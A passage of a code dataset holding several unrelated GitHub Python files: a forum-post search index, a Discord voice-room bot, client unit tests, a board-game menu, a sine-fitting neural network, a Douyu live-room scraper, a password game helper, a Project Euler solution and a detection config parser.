id=NUMERIC(sortable=True),\n subject=TEXT,\n body=TEXT,\n date=DATETIME,\n json=STORED,\n views=NUMERIC,\n folders=TEXT,\n has_answer=BOOLEAN\n )\n\n def post_to_document(self, document):\n return { \n 'id': document.id,\n 'subject': document.subject,\n 'body': document.body,\n 'date': document.date,\n 'json': document.json,\n 'views': document.views,\n 'folders':document.folders,\n 'has_answer':document.has_answer\n } \n\n # add all documents to the index\n def add_to_index(self, documents):\n writer = self.ix.writer()\n for document in documents:\n dict = self.post_to_document(document)\n writer.add_document(**dict)\n writer.commit()\n\n # create index from scratch\n def create_index(self):\n documents = self.bot.get_all_posts()\n self.add_to_index(documents)\n print('\\nindex created!\\n\\n')\n\n # incremental update to index\n def update_index(self):\n # get the last indexed post\n last_post = self.search_numeric('id', 0, INF, 1)\n documents = self.bot.get_all_posts(last_post[0].id)\n self.add_to_index(documents)\n print('\\nindex updated!\\n\\n')\n\n # search for query terms in the description\n def search(self, query, limit, sort_by_field=None):\n print(query)\n ret_list = []\n with self.ix.searcher() as searcher:\n if sort_by_field == None:\n results = searcher.search(query, limit=limit)\n else:\n results = searcher.search(query, limit=limit, sortedby=sort_by_field, reverse=True)\n for result in results:\n ret_list.append(Post(result['json']))\n return ret_list\n\n # get all posts with field having query terms\n def search_terms(self, field, query_terms, limit = INF):\n print('searching \\'{0}\\'...'.format(query_terms))\n all_results = []\n for word in query_terms.split():\n query = Term(field, word)\n all_results.extend(self.search(query, limit))\n return all_results\n\n # get all posts with field between low and high\n def search_numeric(self, field, low=0, high=INF, limit=INF):\n query = NumericRange(field, low, high)\n return self.search(query, limit, field)\n\n # get all posts between dates start_date and end_date\n def search_date(self, field, start_date, end_date, limit=INF):\n query = DateRange(field, start_date, end_date)\n return self.search(query, limit)\n\n def search_folder(self, query_term, limit=INF):\n query = Term('folders', query_term)\n all_results = self.search(query, limit)\n return all_results\n\n def search_unanswered(self, limit=INF):\n query = Term('has_answer', False)\n all_results = self.search(query, limit)\n return all_results\n\n def search_other_unanswered(self, limit=INF):\n dummy_bot = Bot(config.class_code)\n all_posts = dummy_bot.get_all_posts()\n unanswered = []\n for post in all_posts:\n if post.has_answer == False:\n unanswered.append(post)\n return unanswered\n\ndef main():\n if len(sys.argv) == 1:\n id = Index()\n else:\n query_terms = sys.argv[1:]\n id = Index()\n results = id.search_terms('body',' '.join(query_terms))\n #results = id.search_numeric('upvotes',0, 1000, 20)\n print(len(results))\n for result in results:\n print(result)\n print('\\n')\n if len(results) == 0:\n print('no search results for the given term')\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pranavr93/piazza_bot","sub_path":"src/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"21426601753","text":"from discord import app_commands\nfrom dotenv import load_dotenv\nfrom discord.ext import tasks\nimport discord, 
os\n\nload_dotenv()\n\nclient = discord.Client(intents=discord.Intents.all())\ntree = app_commands.CommandTree(client)\n\nserver_configs = {} # Store server-specific configurations\n\n@client.event\nasync def on_ready():\n print(f'Logged in as {client.user.name}')\n check_empty_channels.start()\n await tree.sync()\n print('Synced')\n\n@tasks.loop(seconds=1)\nasync def check_empty_channels():\n for server_id, server_data in list(server_configs.items()):\n guild = client.get_guild(server_id)\n if guild:\n user_channels = server_data['user_channels']\n \n for channel_id, channel in list(user_channels.items()):\n if len(channel.members) == 0:\n await channel.delete()\n del user_channels[channel_id]\n \n \n@client.event\nasync def on_voice_state_update(member, before, after):\n guild = member.guild\n server_id = guild.id\n server_data = server_configs.get(server_id)\n\n if not server_data: return\n\n target_channel_id = server_data['target_channel_id']\n target_category_id = server_data['target_category_id']\n user_channels = server_data['user_channels']\n\n if after.channel and after.channel.id == target_channel_id:\n if member.id in user_channels:\n await member.move_to(user_channels[member.id])\n else:\n overwrites = {\n guild.default_role: discord.PermissionOverwrite(connect=False),\n member: discord.PermissionOverwrite(connect=True)\n }\n category = guild.get_channel(target_category_id)\n channel_name = f\"{member.display_name}'s room\"\n channel = await category.create_voice_channel(channel_name, overwrites=overwrites)\n user_channels[member.id] = channel\n await member.move_to(channel)\n \n if before.channel and before.channel.id == target_channel_id:\n if before.channel.name == f\"{member.display_name}'s room\":\n if member.id in user_channels:\n del user_channels[member.id]\n\n@tree.command(name=\"help\", description=\"Shows the help menu.\")\nasync def help(interaction):\n embed = discord.Embed(\n title=\"Help Menu\",\n description=\"The help menu for Game Host.\\n\\nHere are the commands you can use:\",\n colour=0x00b0f4\n )\n embed.add_field(name=\"/help\", value=\"Brings up this menu.\", inline=True)\n embed.add_field(name=\"/bind\", value=\"Bind the bot to a channel.\", inline=True)\n\n await interaction.response.send_message(embed=embed)\n\n@tree.command(name=\"bind\", description=\"Sets the bot up.\")\n@app_commands.describe(channel=\"The create channel.\", category=\"The room category. 
If empty, will be the same category as the create channel.\")\nasync def bind(interaction, channel: discord.VoiceChannel, category: discord.CategoryChannel = None):\n server_id = interaction.guild_id\n if server_id not in server_configs:\n server_configs[server_id] = {\n 'target_channel_id': None,\n 'target_category_id': None,\n 'user_channels': {}\n }\n \n if not category:\n category = channel.category\n \n server_data = server_configs[server_id]\n server_data['target_channel_id'] = channel.id\n server_data['target_category_id'] = category.id\n \n embed = discord.Embed(\n title=\"Binded\",\n description=f\"You have now binded Game Host to {channel}.\",\n colour=0x00b0f4\n ).add_field(name=\"Discord support\", value=\"https://discord.gg/gYhaWJz8UZ\", inline=True)\n \n await interaction.response.send_message(embed=embed)\n\nclient.run(os.getenv('token'))\n","repo_name":"deezed420/gamehost","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19684700327","text":"import unittest\nfrom unittest.mock import patch\nfrom client import Client\nfrom testdata import dict1, dict2, dict3, dict4, emptydict\n\nclass TestClient(unittest.TestCase):\n \"\"\"Test cases for the Client class.\"\"\"\n\n def setUp(self):\n \"\"\"Set up the Client object before each test.\"\"\"\n self.client = Client()\n\n @patch(\"builtins.input\", side_effect=[\"name\", \"nicholas\"])\n def test_createdict_single_dict(self, mock_input):\n \"\"\"\n Test createdict method for a single dictionary.\n\n This test case mocks the user input and tests the createdict method of\n the Client class for creating a single dictionary. It provides the mock\n input 'name' and 'nicholas' and checks if the returned dictionary matches\n the expected dictionary.\n \"\"\"\n num_members = 1\n num_keys = 1\n expected_dict = [{'name': 'nicholas'}]\n result = self.client.createdict(num_members, num_keys)\n self.assertEqual(result, expected_dict)\n\n @patch(\"builtins.input\", side_effect=[\"hobby\", \"Surfing\", \"number\", \"10\", \"group\", \"b\", \"project\", \"server\"])\n def test_createdict_multiple_dicts(self, mock_input):\n \"\"\"\n Test createdict method for multiple dictionaries.\n\n This test case mocks the user input and tests the createdict method of\n the Client class for creating multiple dictionaries. 
It provides the mock\n        input 'hobby', 'Surfing', 'number', '10', 'group', 'b', 'project', and\n        'server', and checks if the returned list of dictionaries matches the\n        expected list of dictionaries.\n        \"\"\"\n        num_members = 2\n        num_keys = 2 # Provide enough keys and values for two dictionaries with two pairs each\n        expected_dict = [\n            {'hobby': 'Surfing', 'number': '10'},\n            {'group': 'b', 'project': 'server'}\n        ]\n        result = self.client.createdict(num_members, num_keys)\n        self.assertEqual(result, expected_dict)\n\n    def tearDown(self):\n        \"\"\"Clean up after each test by closing the client socket.\"\"\"\n        self.client.client.close()\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"YoHomeE/End-Of-Module-Assignment","sub_path":"Tests/utest4.py","file_name":"utest4.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"12336230812","text":"import os\nfrom .game_platform import Game, CommandLine, Piece\nfrom .game_platform.ai_player import AI_Player\nfrom .communication_platform.communicator import Communicator\nfrom .utils import *\n\nimport colorama\nimport sys\n\nclass Menu:\n    def __init__(self):\n        colorama.init(True)\n\n    def menu(self):\n        \"\"\"Prints out the menu and gets the user's input.\n        If the input is 1, it will create and start a local game. It will check after every turn if any player has won. If a player has won, it will print who won and the menu again.\n        If the input is 2, it will start an online game.\n        If the input is 3, it will describe how to play the game.\n        If the input is 4, it will quit the program.\n\n        Keyword arguments:\n        return -- Prints out the menu which the user can choose from.\n        \"\"\"\n        clear_screen()\n        while True:\n            print('### UU-GAME ###')\n            print(\"### You can at all times quit the game by inputting [Q] ###\")\n            print('1. Play Local')\n            print('2. Play Online')\n            print('3. How to play')\n            print('4. Quit')\n\n            user_input = input('Please enter your choice from the menu and press enter: ')\n            if user_input == '1':\n                clear_screen()\n                print('### LOCAL-GAME ###')\n                print('1. Player 1 vs Player 2')\n                print('2. 
Player 1 vs Computer')\n                user_input_again = input('Please enter your choice from the menu and press enter: ')\n                if user_input_again == '1':\n                    game = Game()\n                    cmd = CommandLine(game)\n                    while (True):\n\n                        cmd.print_board()\n                        self.info()\n                        cmd.play()\n\n                        if (cmd.game.check_if_piece_won_game(Piece.Black)):\n                            cmd.print_board()\n                            print(\"Black has won the game\")\n                            break\n                        if (cmd.game.check_if_piece_won_game(Piece.White)):\n                            cmd.print_board()\n                            print(\"White has won the game\")\n                            break\n                elif user_input_again == '2':\n                    game = Game()\n                    cmd = CommandLine(game)\n                    self.ai = AI_Player(game)\n                    # Makes sure that it's a new game_file every new game against the AI.\n                    print('This is where we play against the AI')\n                    difficulty = \"-1\"\n                    while difficulty not in [\"0\", \"1\", \"2\"]:\n                        difficulty = input(\"Choose difficulty level (Easy - 0, Medium - 1, Hard - 2): \")\n                    \n                    # Calls on the function that mainly manages the game against the AI.\n                    self.play_against_AI(cmd, difficulty)\n\n                menu_input = input('<- Back to main menu, input 3 and press enter: ')\n                if menu_input == '3':\n                    clear_screen()\n            elif user_input == '2':\n                clear_screen()\n                communicator = Communicator()\n                communicator.start()\n            elif user_input == '3':\n                clear_screen()\n                game = Game()\n                cmd = CommandLine(game)\n                cmd.print_board()\n                howto_text = f\"\"\"\nThis is a preview of the board.\nBlack player’s pieces are denoted by {colorama.Fore.MAGENTA}B{colorama.Style.RESET_ALL} and white player’s pieces are denoted by {colorama.Style.BRIGHT}W{colorama.Style.RESET_ALL}.\nThe pieces you have not placed yet are represented below the board.\n\n* Both players in the game will have twelve pieces each and have twenty four places to place on the board.\n* The player who starts first will always be black.\n* The board starts empty and each player will have to place their pieces on the board taking turns.\n* You can take your opponent’s piece out of the board if you have a three in a row.\n* Three in a row can be done horizontally, vertically or even diagonally.\n* Once all the pieces are placed on the board, each player can move their pieces to adjacent empty places along the lines.\n* When a player has three pieces left on the board, the player can move their pieces to any empty place on the board.\n\nA player will win the game if either of these two conditions is satisfied\n1. When their opponent’s pieces are reduced to less than three.\n2. If you can surround your opponent’s pieces making them unable to move or match three in a row.\n\nThe game will end in a draw when the total amount of turns reaches 200.\n\"\"\"\n                print(howto_text)\n                menu_input = input('<- Back to main menu, input 1 and press enter: ')\n                if menu_input == '1':\n                    clear_screen()\n\n            elif user_input == '4':\n                self.quit_in_main_menu()\n\n    def quit(self):\n        \"\"\"\n        Gives the user 3 options when quit() is being called in terminal by input [q] or [Q]. The user can quit the\n        session by heading back to main menu with input [M] or [m], quit the complete game in terminal with input\n        [q] or [Q] or cancel and head back to the session the user was on before calling for quit by cancelling with\n        input [c] or [C].\n\n        Keyword arguments:\n        \"\"\"\n        alternatives = [\"M\", \"m\", \"Q\", \"q\", \"C\", \"c\"]\n        while True:\n            user_input = input(\"To quit the game insert [Q], to get back to main menu [M] or cancel [C]: \")\n            if user_input in alternatives:\n                break\n\n        if user_input == 'M' or user_input == 'm':\n            clear_screen()\n            self.menu()\n\n        elif user_input == 'Q' or user_input == 'q':\n            clear_screen()\n            sys.exit('You have quit the UU-Game')\n\n        elif user_input == 'C' or user_input == 'c':\n            return\n\n    def quit_in_main_menu(self):\n        \"\"\"\n        Gives the user 2 options when they want to quit the game from the main menu. Quit the complete game in terminal\n        with input [q] or [Q] or cancel and head back to the main menu with input [c] or [C].\n\n        Keyword arguments:\n        \"\"\"\n        alternatives = [\"Q\", \"q\", \"C\", \"c\"]\n        while True:\n            user_input = input(\"To quit the game insert [Q] or cancel [C]: \")\n            if user_input in alternatives:\n                break\n\n        if user_input == 'Q' or user_input == 'q':\n            clear_screen()\n            sys.exit('You have quit the UU-Game')\n\n        elif user_input == 'C' or user_input == 'c':\n            clear_screen()\n            self.menu()\n\n    def info(self):\n        \"\"\"\n        Prints static information under the game board to inform the user how to quit the game.\n        \"\"\"\n        padding = 25\n        reset_code = colorama.Style.RESET_ALL + colorama.Style.DIM\n        print(\" \"*padding + colorama.Fore.YELLOW + \"To quit input [Q]\" + reset_code)\n\n    def play_against_AI(self, cmd, difficulty):\n        \"\"\" This function takes in the chosen difficulty level (string) of the\n        AI and plays against the AI. It lets both the AI and the Player play\n        and translates the moves and updates both the boards between the\n        turns. This is the function to call that manages the overall game\n        against the AI.\n        \"\"\"\n        # Delete save_file\n        # Create save_file\n        # While loop that checks how long we play\n        # Player as Input -> Translate Input -> Save in save_file\n        # AI plays -> Read save_file -> Translate output -> Send it in as Player 2\n        # If phase 1 call moves_to and check if eliminate\n        # If phase 2 call ai_moves_from\n\n        while (True):\n            cmd.print_board()\n            if (cmd.game.turn == Piece.Black):\n                cmd.play()\n            else:\n                self.ai.the_ai_turn(difficulty)\n            result = cmd.game.get_game_winner()\n\n            if (result == Game.WinnerResults.BlackWon):\n                cmd.print_board()\n                print(\"Black has won the game\")\n                break\n            if (result == Game.WinnerResults.WhiteWon):\n                cmd.print_board()\n                print(\"White has won the game\")\n                break\n            if (result == Game.WinnerResults.Tie):\n                cmd.print_board()\n                print(\"It's a draw! 
Max amount of turns is 200\")\n break\n\n","repo_name":"Nusrat-16/Software-engineering-and-project-management","sub_path":"src/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":8466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18252124680","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n# —準備輸入與正解—\r\ninput_data = np.arange(0, np.pi*2, 0.1) # 輸入\r\ncorrect_data = np.sin(input_data) # 正確答案\r\ninput_data = (input_data-np.pi)/np.pi # 輸入為 -1.0~1.0 的範圍內\r\nn_data = len(correct_data) # 資料的數量\r\n\r\n# —各設定值—\r\nn_in = 1 # 輸入層的神經元數量\r\nn_mid = 3 # 中間層的神經元數量\r\nn_out = 1 # 輸出層的神經元數量\r\n\r\nwb_width = 0.01 # 權重與偏值的範圍\r\neta = 0.1 # 學習率\r\nepoch = 1001\r\ninterval = 100 # 顯示進度的間隔\r\n\r\n# -- 中間層 --\r\nclass MiddleLayer:\r\n def __init__(self, n_upper, n): # 初期設定\r\n self.w1 = wb_width * np.random.randn(n_upper, n) # 權重(矩陣)\r\n self.b1 = wb_width * np.random.randn(n) # 偏值(向量)\r\n\r\n def forward(self, x): # 前向傳播\r\n self.x = x\r\n u1 = np.dot(x, self.w1) + self.b1\r\n self.y1 = 1/(1+np.exp(-u1)) # sigmoid 函數\r\n \r\n def backward(self, grad_y1): # 反向傳播\r\n delta1 = grad_y1 * (1-self.y1)*self.y1 # sigmoid 函數的微分\r\n \r\n self.grad_w1= np.dot(self.x.T, delta1)\r\n self.grad_b1 = np.sum(delta1, axis=0)\r\n \r\n def update(self, eta): # 更新權重與偏值\r\n self.w1 -= eta * self.grad_w1\r\n self.b1 -= eta * self.grad_b1\r\n\r\n# -- 輸出層 --\r\nclass OutputLayer:\r\n def __init__(self, n_upper, n): # 初期設定\r\n self.w2 = wb_width * np.random.randn(n_upper, n) #權重(矩陣)\r\n self.b2 = wb_width * np.random.randn(n) # 偏值(向量)\r\n \r\n def forward(self, y1): # 前向傳播\r\n self.y1 = y1\r\n u2 = np.dot(y1, self.w2) + self.b2\r\n self.y2 = u2 # 恆等函數\r\n \r\n def backward(self, t): # 反向傳播\r\n delta2 = self.y2 - t\r\n \r\n self.grad_w2 = np.dot(self.y1.T, delta2)\r\n self.grad_b2 = np.sum(delta2, axis=0)\r\n \r\n self.grad_y1 = np.dot(delta2, self.w2.T) \r\n\r\n def update(self, eta): # 更新權重與偏值\r\n self.w2 -= eta * self.grad_w2\r\n self.b2 -= eta * self.grad_b2\r\n\r\n\r\n# -- 各層的初始化 --\r\nmiddle_layer = MiddleLayer(n_in, n_mid)\r\noutput_layer = OutputLayer(n_mid, n_out)\r\n\r\n\r\n\r\n# -- 學習 --\r\nfor i in range(epoch):\r\n\r\n # 索引洗牌\r\n index_random = np.arange(n_data)\r\n np.random.shuffle(index_random)\r\n \r\n # 顯示結果用\r\n total_error = 0\r\n plot_x = []\r\n plot_y2 = []\r\n \r\n for idx in index_random:\r\n \r\n x = input_data[idx:idx+1] # 輸入\r\n t = correct_data[idx:idx+1] # 正確答案\r\n \r\n # 前向傳播\r\n middle_layer.forward(x.reshape(1, 1)) # 把輸入轉換成陣列\r\n output_layer.forward(middle_layer.y1) \r\n\r\n # 反向傳播\r\n output_layer.backward(t.reshape(1, 1)) # 反向傳播\r\n middle_layer.backward(output_layer.grad_y1)\r\n \r\n # 更新權重與偏值\r\n middle_layer.update(eta)\r\n output_layer.update(eta)\r\n \r\n if i%interval == 0:\r\n \r\n y2 = output_layer.y2.reshape(-1) # 將矩陣恢復成向量\r\n\r\n # 誤差計算\r\n total_error += 1.0/2.0*np.sum(np.square(y2 - t)) # 計算均方誤差\r\n \r\n # 輸出的記錄\r\n plot_x.append(x)\r\n plot_y2.append(y2)\r\n \r\n if i%interval == 0:\r\n \r\n # 顯示輸出的圖表\r\n \r\n\r\n plt.plot(input_data, correct_data, linestyle=\"dashed\")\r\n plt.scatter(plot_x, plot_y2, marker=\"+\")\r\n plt.show()\r\n \r\n # 顯示epoch 次數與誤差\r\n print(\"Epoch:\" + str(i) + \"/\" + str(epoch), \"Error:\" + str(total_error/n_data))","repo_name":"7-RED/Numpy","sub_path":"SineLearning/sine.py","file_name":"sine.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 
+{"seq_id":"421750122","text":"import time\nfrom selenium import webdriver\n\nclass Spider(object):\n def __init__(self):\n self.url = 'https://www.douyu.com/directory/all'\n self.driver = webdriver.Chrome()\n\n\n def parse_data(self):\n # 获取所有的房间节点列表\n room_list = self.driver.find_elements_by_xpath('//*[@id=\"live-new-show-content-box\"]/li/a')\n\n data_list = []\n\n for room in room_list:\n temp = {}\n temp['title'] = room.find_element_by_xpath('./div/div/h3').text\n temp['type'] = room.find_element_by_xpath('./div/div/span').text\n temp['owner'] = room.find_element_by_xpath('./div/p/span[1]').text\n # temp['num'] = room.find_element_by_xpath('./div/p/span[2]').text\n # 从selenium定位到的元素中取值: get_attribute()\n temp['cover'] = room.find_element_by_xpath('./span/img').get_attribute('src')\n print(temp)\n data_list.append(temp)\n return data_list\n\n def save_data(self,data_list):\n pass\n\n def __del__(self):\n self.driver.close()\n\n def run(self):\n # url\n while True:\n # 发送请求\n self.driver.get(self.url)\n data_list = self.parse_data()\n self.save_data(data_list)\n # 翻页\n try:\n el_next = self.driver.find_element_by_xpath('//a[@class=\"shark-pager-next\"]')\n el_next.click()\n time.sleep(3)\n except:\n break\n\nif __name__ == '__main__':\n spider = Spider()\n spider.run()","repo_name":"ioscarry/JXWY_PLUS","sub_path":"douyu/douyu.py","file_name":"douyu.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15850500604","text":"import random\ndef GerarSenha(cores,quantCores):\n senha_certa = []\n for n in range (quantCores):\n corAleatoria = random.choice(cores)\n while corAleatoria in senha_certa:\n corAleatoria = random.choice(cores)\n senha_certa.append(corAleatoria)\n return senha_certa\n\ndef ValidarPalpite (cores,palpiteJogador):\n if palpiteJogador not in cores:\n return False\n else:\n return True\n\ndef TestarVitoria(senha,palpite):\n if senha == palpite:\n return True\n else:\n return False\n\ndef TestarAcertosTotais (senha,palpite):\n AcertosTotais = 0\n for n in range (len(senha)):\n if senha[n] == palpite[n]:\n AcertosTotais += 1\n return AcertosTotais\n \n","repo_name":"CarolShiny/Jogo-Senha","sub_path":"bibSenhaCarolRodolpho.py","file_name":"bibSenhaCarolRodolpho.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24694335744","text":"import sys\n\nn = sys.argv[1:]\nn = int(n[0].strip())\nif n == 0:\n print(0)\nelse:\n i = n\n total = 1\n while i > 0:\n total *= i\n i -= 1\n s = str(total)\n total = 0\n for n in s:\n total += int(n)\n print(total)","repo_name":"type0-1/Project-Euler","sub_path":"euler-20-factorial-digit-sum.py","file_name":"euler-20-factorial-digit-sum.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35112546887","text":"import os\nimport sys\nimport yaml\nimport keyword\nimport argparse\nimport reprlib\n\nfrom typing import List, Dict, Any, MutableMapping, MutableSequence, Callable, Optional\n\n__all__ = [\"Config\", \"get_config\"]\n\n\nVALID_CHIPS : List[str] = [\"5801\", \"SIT501\"]\nVALID_DET_TYPE : List[str] = [\"camara\", \"image\", \"video\"]\nVALID_IMG_EXT : List[str] = [\".jpg\", \".jpeg\", \".png\"]\nVALID_VID_EXT : List[str] = [\".mp4\", \".avi\"]\n\n\ndef _assert_with_msg_or_exit(assertion: bool, msg: str):\n if not assertion:\n print(msg)\n 
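# re-draw until the colour is not already in the password (note: this loop never ends if quantCores > len(cores))\n            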
sys.exit(-1)\n\n\ndef _check_path_is_valid_type_of(valid_exts: List[str], path: str):\n _, ext = os.path.splitext(path)\n return ext in valid_exts\n\n\ndef _get_files(directory: str, pred: Optional[Callable[[str], bool]] = None, recursive: Optional[bool] = True):\n paths = []\n if recursive:\n for root, _, files in os.walk(directory):\n for file in files:\n if pred is not None and callable(pred) and not pred(file):\n continue\n paths.append(os.path.join(root, file))\n else:\n for file in os.listdir(directory):\n if pred is not None and callable(pred) and not pred(file):\n continue\n paths.append(os.path.join(directory, file))\n return paths\n\n\ndef _check_keys_are_all_valid(d: Dict):\n for k, v in d.items():\n if keyword.iskeyword(k):\n print(f\"[ERROR] Python preserved key: {k}!\")\n sys.exit(-1)\n if isinstance(k, str) and not k.isidentifier():\n print(f\"[ERROR] Invalid python identifier: {k}!\")\n sys.exit(-1)\n if isinstance(v, Dict):\n _check_keys_are_all_valid(v)\n\n\ndef _parse_yaml(file: str):\n \"\"\"Load configuration from yaml file.\"\"\"\n if not os.path.exists(file):\n raise FileNotFoundError(f\"Config yaml file does not exist: {file}\")\n assert file.endswith(\".yaml\"), f\"Not a yaml file: {file}\"\n try:\n with open(file, 'r') as f:\n _c = yaml.safe_load(f)\n except Exception as e:\n print(f\"[ERROR] {e}\")\n sys.exit(-1)\n return Config(_c)\n\n\nclass Config(object):\n \"\"\"Config class to parse yaml files.\"\"\"\n _instance = False\n\n def __new__(cls, arg: Any):\n if isinstance(arg, MutableMapping):\n return super().__new__(cls)\n elif isinstance(arg, MutableSequence):\n return [cls(item) for item in arg]\n else:\n return arg\n\n def __init__(self, mapping: MutableMapping[str, Any]):\n _check_keys_are_all_valid(mapping)\n self._c = mapping\n self._instance = True\n\n def __getattr__(self, key: str):\n if not self._instance:\n return super().__getattribute__(key)\n if hasattr(self._c, key):\n return getattr(self._c, key)\n else:\n _assert_with_msg_or_exit(key in self._c, f\"[ERROR] `{key}` not in cfg, current keys: {list(self._c.keys())}\")\n return self.__class__(self._c[key])\n\n def __setattr__(self, key: str, value: Any):\n if not self._instance:\n return super().__setattr__(key, value)\n if hasattr(self._c, key):\n print(f\"[ERROR] Invalid key: {key}\")\n sys.exit(-1)\n else:\n self._c[key] = value\n\n def __repr__(self, depth: Optional[int] = 0):\n s = \"====== Configurations ======\\n\" if not depth else \"\"\n for k, v in self._c.items():\n s += \" \" * depth\n if isinstance(v, MutableMapping):\n s += f\"{k}:\\n{self.__class__(v).__repr__(depth + 1)}\"\n else:\n s += f\"{k}: {reprlib.repr(v)}\\n\"\n s += \"===========================\\n\" if not depth else \"\"\n return s\n\n\ndef get_config():\n _C = _parse_yaml(r\"GNetDet.yaml\")\n _assert_with_msg_or_exit(\n _C.CHIP in VALID_CHIPS, f\"[ERROR] Wrong Chip: `{_C.CHIP}`! Only these chips are supported: {VALID_CHIPS}\"\n )\n\n parser = argparse.ArgumentParser(description=f\"Run Object Detection on {_C.CHIP} using {_C.MODEL.NAME}.\")\n parser.add_argument(\"type\",\n type=str,\n help=\"Type of detection (eg. `camara`, `image` or `video`).\")\n parser.add_argument(\"-m\",\n \"--model\",\n type=str,\n default=\"./out.model\",\n help=\"Model path of *.model. Default is `./out.model`\")\n parser.add_argument(\"-i\",\n \"--input\",\n type=str,\n default=\"\", # Leave empty here to force that users must specify this arg explicitly.\n help=\"Path of input. REQUIRED if `type == image` or `type == video`. 
The input path could \"\n \"be a specific image/video file path that are going to be detected, or a valid directory \"\n \"path containing image(s)/video(s) to be detected.\")\n parser.add_argument(\"-o\",\n \"--output\",\n type=str,\n default=\"\",\n help=\"Optional, path of output. If `type == image` or `type == video`. the output path could \"\n \"be a specific image/video file path to save detection results, or a valid directory \"\n \"path in which all detected results with the same name as input files are to save. \"\n \"If `output` is not given, then the detection results will just show up immediately.\")\n parser.add_argument(\"--input-size\",\n type=int,\n default=_C.MODEL.INPUT.SIZE,\n help=\"Size of input image, must be either 448 or 224. If given, this value will override \"\n \"MODEL.INPUT.SIZE in yaml file.\")\n parser.add_argument(\"--input-format\",\n type=int,\n default=_C.MODEL.INPUT.FORMAT,\n help=\"Input image format, must be either 0 (for `BGR`) or 1 (for `YUV`). If given, this value \"\n \"will override MODEL.INPUT.FORMAT in yaml file.\")\n parser.add_argument(\"--conf-thresh\",\n type=float,\n default=_C.OPTS.CONF_THRESH,\n help=\"Threshold of confidence. A valid detection is that the output confidence is larger \"\n \"than `conf_thresh`. If given, this value will override OPTS.CONF_THRESH in yaml file.\")\n parser.add_argument(\"--prob-thresh\",\n type=float,\n default=_C.OPTS.PROB_THRESH,\n help=\"Threshold of probability. The probability (final confidence) of a output object is \"\n \"its confidence times the maximum confidence among all objects in a single image. \"\n \"Thus a valid detection is that the output probability is larger then `prob_thresh`. \"\n \"If given, this value will override OPTS.PROB_THRESH in yaml file.\")\n parser.add_argument(\"--nms-thresh\",\n type=float,\n default=_C.OPTS.NMS_THRESH,\n help=\"IOU threshold in NMS. A valid detection is that the bounding box parameterized by \"\n \"(xmin, xmax, ymin, ymax) coordinates has less iou value than nms_thresh. If given, \"\n \"this value will override OPTS.NMS_THRESH in yaml file.\")\n parser.add_argument(\"-f\",\n \"--fancy\",\n action=\"store_true\",\n default=False,\n help=\"If present, drawing fancier bounding boxes.\")\n\n args = parser.parse_args()\n\n # Check detection type\n _assert_with_msg_or_exit(\n args.type in VALID_DET_TYPE, f\"[ERROR] Invalid type: {args.type}! 
Must be one of {VALID_DET_TYPE}.\"\n )\n\n # Check model\n _assert_with_msg_or_exit(\n os.path.exists(args.model), f\"[ERROR] Model does not exist: {args.model}\"\n )\n\n # Check paths\n if args.type != \"camara\":\n\n # Check input path\n _assert_with_msg_or_exit(\n os.path.exists(args.input), f\"[ERROR] Input source does not exist: {args.input}\"\n )\n\n # Input path must be file or directory\n if os.path.isfile(args.input):\n is_image = _check_path_is_valid_type_of(VALID_IMG_EXT, args.input)\n is_video = _check_path_is_valid_type_of(VALID_VID_EXT, args.input)\n _assert_with_msg_or_exit(\n (is_image and args.type == \"image\") or (is_video and args.type == \"video\"),\n f\"[ERROR] Current type: `{args.type}` mismatch with input file: `{args.input}`\"\n )\n input_paths = [args.input]\n else:\n _assert_with_msg_or_exit(\n os.path.isdir(args.input), f\"[ERROR] Input directory path does not exists: {args.input}\"\n )\n\n if args.type == \"image\":\n input_paths = _get_files(args.input, lambda p: _check_path_is_valid_type_of(VALID_IMG_EXT, p), recursive=False)\n else:\n input_paths = _get_files(args.input, lambda p: _check_path_is_valid_type_of(VALID_VID_EXT, p), recursive=False)\n _assert_with_msg_or_exit(\n bool(input_paths), f\"[ERROR] No {args.type} under directory: {args.input}\"\n )\n\n _assert_with_msg_or_exit(\n all(map(lambda p: ',' not in p, input_paths)),\n f\"Path contain `,` which is not allowed in input path.\"\n )\n args.input = ','.join(input_paths)\n\n # Check output path\n if args.output:\n # output is file path\n if os.path.splitext(args.output)[1]:\n is_image = _check_path_is_valid_type_of(VALID_IMG_EXT, args.output)\n is_video = _check_path_is_valid_type_of(VALID_VID_EXT, args.output)\n _assert_with_msg_or_exit(\n (is_image and args.type == \"image\") or (is_video and args.type == \"video\"),\n f\"[ERROR] Current type: `{args.type}` mismatch with output file: `{args.output}`\"\n )\n output_paths = [args.output]\n\n # output is directory path\n else:\n os.makedirs(args.output, exist_ok=True)\n output_paths = []\n for path in input_paths:\n output_paths.append(os.path.join(args.output, f\"out_{os.path.basename(path)}\"))\n\n _assert_with_msg_or_exit(\n all(map(lambda p: ',' not in p, output_paths)),\n f\"[ERROR] Path contain `,` which is not allowed in output path.\"\n )\n args.output = ','.join(output_paths)\n\n # class_names match with num_classes\n _assert_with_msg_or_exit(\n len(_C.DATA.CLASS_NAMES) == _C.DATA.NUM_CLASSES,\n f\"[ERROR] len(class_names) != num_classes, Check yaml file.\"\n )\n\n # Search LIBGITSDK\n libgtisdk = \"\"\n try:\n for path in [\".\", *filter(lambda p: bool(p), 